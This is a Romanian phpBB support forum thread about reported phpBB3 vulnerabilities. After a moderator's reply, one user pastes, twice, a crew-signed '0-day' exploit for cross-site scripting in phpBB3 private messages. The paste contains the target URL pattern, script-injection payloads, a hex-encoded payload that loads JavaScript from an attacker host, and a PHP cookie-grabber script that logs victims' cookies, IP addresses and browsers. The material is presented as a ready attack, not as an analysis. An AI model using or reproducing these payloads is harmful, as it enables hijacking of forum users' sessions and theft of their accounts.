Baieti Din Cate Am Intales Au Aparut Ceva Bugurii In Phpbb3
http://secunia.com/product/17998/
http://securitydot.net/vuln/exploits/vu ... /vuln.html
Vreau Sa Va Intreb Daca cei din phpbb.com o sa faca ceva update pentru rezolvarea acestor buguri
Bug-urii phpbb3
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
-
flowers
- Mesaje: 4641
- Membru din: 03-Iun-2004, 17:50:34
- Ext: Nu
- Server: Windows
- Nivel phpBB: Mediu
- Nivel php: Mediu
- Localitate: Bucureşti, România
- Contact:
Re: Bug-urii phpbb3
Normal ca va aparea un update daca acele buguri sunt reale. Urmariti ultimele stiri de la phpbb.com si phpbb.ro.CHR scrie:Baieti Din Cate Am Intales Au Aparut Ceva Bugurii In Phpbb3
http://secunia.com/product/17998/
http://securitydot.net/vuln/exploits/vu ... /vuln.html
Vreau Sa Va Intreb Daca cei din phpbb.com o sa faca ceva update pentru rezolvarea acestor buguri
-
CHR
- Utilizator înregistrat
- Mesaje: 104
- Membru din: 16-Mai-2008, 21:53:38
- Versiune: 3.0.5
- Ext: Da
- Server: UNIX/Linux
- Nivel phpBB: Puţin experimentat
Da ce am spus eu a fost adevar uita sa facut public pana acum era la vip
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
Quote:
http://TRAGET/ucp.php?i=pm&mode=compose ... ss]&p=6779
Where is:
Quote:
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
Quote:
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)
Cookies grabber:
Quote:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?>
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
Quote:
http://TRAGET/ucp.php?i=pm&mode=compose ... ss]&p=6779
Where is:
Quote:
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
Quote:
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)
Cookies grabber:
Quote:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?>
Cine este conectat
Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 7 vizitatori